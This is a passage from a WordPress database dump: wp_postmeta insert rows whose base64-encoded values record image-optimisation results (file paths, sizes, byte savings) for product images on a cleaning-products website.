29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29udGFjdC1jbGVhbmVyLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvY29udGFjdC1jbGVhbmVyLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoxMDMyLCJ0aW1lIjoxNDgzNTY3OTY0LCJpZCI6MTYzNH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9jb250YWN0LWNsZWFuZXItMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29udGFjdC1jbGVhbmVyLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9jb250YWN0LWNsZWFuZXItMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6Mzc1NSwidGltZSI6MTQ4MzU2Nzk2OSwiaWQiOjE2MzR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29udGFjdC1jbGVhbmVyLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29udGFjdC1jbGVhbmVyLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvY29udGFjdC1jbGVhbmVyLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo1NDksInRpbWUiOjE0ODM1Njc5NzIsImlkIjoxNjM0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2NvbnRhY3QtY2xlYW5lci0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2NvbnRhY3QtY2xlYW5lci0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2NvbnRhY3QtY2xlYW5lci0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDQ5LCJ0aW1lIjoxNDgzNTY3OTc1LCJpZCI6MTYzNH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9jb250YWN0LWNsZWFuZXItMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9jb250YWN0LWNsZWFuZXItMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9jb250YWN0LWNsZWFuZXItMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjUwNiwidGltZSI6MTQ4MzU2Nzk3OSwiaWQiOjE2MzR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29udGFjdC1jbGVhbmVyLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29udGFjdC1jbGVhbmVyLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvY29udGFjdC1jbGVhbmVyLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjo5NDgsInRpbWUiOjE0ODM1Njc5ODIsImlkIjoxNjM0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29udGFjdC1jbGVhbmVyLTE2MHgxNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29udGFjdC1jbGVhbmVyLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvY29udGFjdC1jbGVhbmVyLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjo0OTYsInRpbWUiOjE0ODM1Njc5ODYsImlkIjoxNjM0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29udGFjdC1jbGVhbmVyLTIyNXgzNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29udGFjdC1jbGVhbmVyLTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvY29udGFjdC1jbGVhbmVyLTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjo3MjYsInRpbWUiOjE0ODM1Njc5ODksImlkIjoxNjM0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29udGFjdC1jbGVhbmVyLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29udGFjdC1jbGVhbmVyLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvY29udGFjdC1jbGVhbmVyLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo3OTIsInRpbWUiOjE0ODM1Njc5OTMsImlkIjoxNjM0fV0='); 
INSERT INTO `wp_postmeta` VALUES (29372, 1633, 'wpfc_optimisation_reduction', '9202'); 
INSERT INTO `wp_postmeta` VALUES (29373, 1633, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcGxhc3RpYy1tZXRhbC1nbGFzcy1jbGVhbmVyLTEuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9wbGFzdGljLW1ldGFsLWdsYXNzLWNsZWFuZXItMS5qcGciLCJ3aWR0aCI6NTc2MCwiaGVpZ2h0IjozODQwLCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTY3OTk3LCJpZCI6IjE2MzMifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3BsYXN0aWMtbWV0YWwtZ2xhc3MtY2xlYW5lci0xLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcGxhc3RpYy1tZXRhbC1nbGFzcy1jbGVhbmVyLTEtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9wbGFzdGljLW1ldGFsLWdsYXNzLWNsZWFuZXItMS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NjU4LCJ0aW1lIjoxNDgzNTY4MDAxLCJpZCI6MTYzM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9wbGFzdGljLW1ldGFsLWdsYXNzLWNsZWFuZXItMS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3BsYXN0aWMtbWV0YWwtZ2xhc3MtY2xlYW5lci0xLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcGxhc3RpYy1tZXRhbC1nbGFzcy1jbGVhbmVyLTEtODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjk0MiwidGltZSI6MTQ4MzU2ODAwNSwiaWQiOjE2MzN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcGxhc3RpYy1tZXRhbC1nbGFzcy1jbGVhbmVyLTEtNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9wbGFzdGljLW1ldGFsLWdsYXNzLWNsZWFuZXItMS03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3BsYXN0aWMtbWV0YWwtZ2xhc3MtY2xlYW5lci0xLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoxMDI4LCJ0aW1lIjoxNDgzNTY4MDEwLCJpZCI6MTYzM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9wbGFzdGljLW1ldGFsLWdsYXNzLWNsZWFuZXItMS0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9wbGFzdGljLW1ldGFsLWdsYXNzLWNsZWFuZXItMS0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcGxhc3RpYy1tZXRhbC1nbGFzcy1jbGVhbmVyLTEtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MjMyOSwidGltZSI6MTQ4MzU2ODAxNSwiaWQiOjE2MzN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcGxhc3RpYy1tZXRhbC1nbGFzcy1jbGVhbmVyLTEtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9wbGFzdGljLW1ldGFsLWdsYXNzLWNsZWFuZXItMS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3BsYXN0aWMtbWV0YWwtZ2xhc3MtY2xlYW5lci0xLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo1ODEsInRpbWUiOjE0ODM1NjgwMTksImlkIjoxNjMzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3BsYXN0aWMtbWV0YWwtZ2xhc3MtY2xlYW5lci0xLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcGxhc3RpYy1tZXRhbC1nbGFzcy1jbGVhbmVyLTEtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9wbGFzdGljLW1ldGFsLWdsYXNzLWNsZWFuZXItMS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDY2LCJ0aW1lIjoxNDgzNTY4MDIyLCJpZCI6MTYzM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9wbGFzdGljLW1ldGFsLWdsYXNzLWNsZWFuZXItMS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3BsYXN0aWMtbWV0YWwtZ2xhc3MtY2xlYW5lci0xLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcGxhc3RpYy1tZXRhbC1nbGFzcy1jbGVhbmVyLTEtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjUzMCwidGltZSI6MTQ4MzU2ODAyNSwiaWQiOjE2MzN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcGxhc3RpYy1tZXRhbC1nbGFzcy1jbGVhbmVyLTEtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9wbGFzdGljLW1ldGFsLWdsYXNzLWNsZWFuZXItMS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3BsYXN0aWMtbWV0YWwtZ2xhc3MtY2xlYW5lci0xLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjo3NjgsInRpbWUiOjE0ODM1NjgwMjksImlkIjoxNjMzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcGxhc3RpYy1tZXRhbC1nbGFzcy1jbGVhbmVyLTEtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9wbGFzdGljLW1ldGFsLWdsYXNzLWNsZWFuZXItMS0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3BsYXN0aWMtbWV0YWwtZ2xhc3MtY2xlYW5lci0xLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjo0MzQsInRpbWUiOjE0ODM1NjgwMzMsImlkIjoxNjMzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcGxhc3RpYy1tZXRhbC1nbGFzcy1jbGVhbmVyLTEtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9wbGFzdGljLW1ldGFsLWdsYXNzLWNsZWFuZXItMS0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3BsYXN0aWMtbWV0YWwtZ2xhc3MtY2xlYW5lci0xLTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjo3NjMsInRpbWUiOjE0ODM1NjgwMzYsImlkIjoxNjMzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcGxhc3RpYy1tZXRhbC1nbGFzcy1jbGVhbmVyLTEtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9wbGFzdGljLW1ldGFsLWdsYXNzLWNsZWFuZXItMS0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3BsYXN0aWMtbWV0YWwtZ2xhc3MtY2xlYW5lci0xLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo3MDMsInRpbWUiOjE0ODM1NjgwNDAsImlkIjoxNjMzfV0='); 
INSERT INTO `wp_postmeta` VALUES (29374, 1624, 'wpfc_optimisation_reduction', '1623'); 
INSERT INTO `wp_postmeta` VALUES (29375, 1624, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVmF6by1sb2dvLTItZTE0NzM3OTAyNjY1ODMuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9WYXpvLWxvZ28tMi1lMTQ3Mzc5MDI2NjU4My5qcGciLCJ3aWR0aCI6NDgwLCJoZWlnaHQiOjE5OCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1Zhem8tbG9nby0yLWUxNDczNzkwMjY2NTgzLmpwZyIsInJlZHVjdGlvbiI6MTQxOSwidGltZSI6MTQ4MzU2ODA0NywiaWQiOiIxNjI0In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9WYXpvLWxvZ28tMi1lMTQ3Mzc5MDI2NjU4My0zNDB4MTk4LmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MTk4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1Zhem8tbG9nby0yLWUxNDczNzkwMjY2NTgzLTM0MHgxOTguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVmF6by1sb2dvLTItZTE0NzM3OTAyNjY1ODMtMzQweDE5OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjgwNDksImlkIjoxNjI0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1Zhem8tbG9nby0yLWUxNDczNzkwMjY2NTgzLTI1MHgxOTguanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoxOTgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVmF6by1sb2dvLTItZTE0NzM3OTAyNjY1ODMtMjUweDE5OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9WYXpvLWxvZ28tMi1lMTQ3Mzc5MDI2NjU4My0yNTB4MTk4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2ODA1MSwiaWQiOjE2MjR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVmF6by1sb2dvLTItZTE0NzM3OTAyNjY1ODMtMjAweDE5OC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjE5OCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9WYXpvLWxvZ28tMi1lMTQ3Mzc5MDI2NjU4My0yMDB4MTk4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1Zhem8tbG9nby0yLWUxNDczNzkwMjY2NTgzLTIwMHgxOTguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY4MDUzLCJpZCI6MTYyNH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9WYXpvLWxvZ28tMi1lMTQ3Mzc5MDI2NjU4My0yMjV4MTk4LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MTk4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1Zhem8tbG9nby0yLWUxNDczNzkwMjY2NTgzLTIyNXgxOTguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVmF6by1sb2dvLTItZTE0NzM3OTAyNjY1ODMtMjI1eDE5OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRp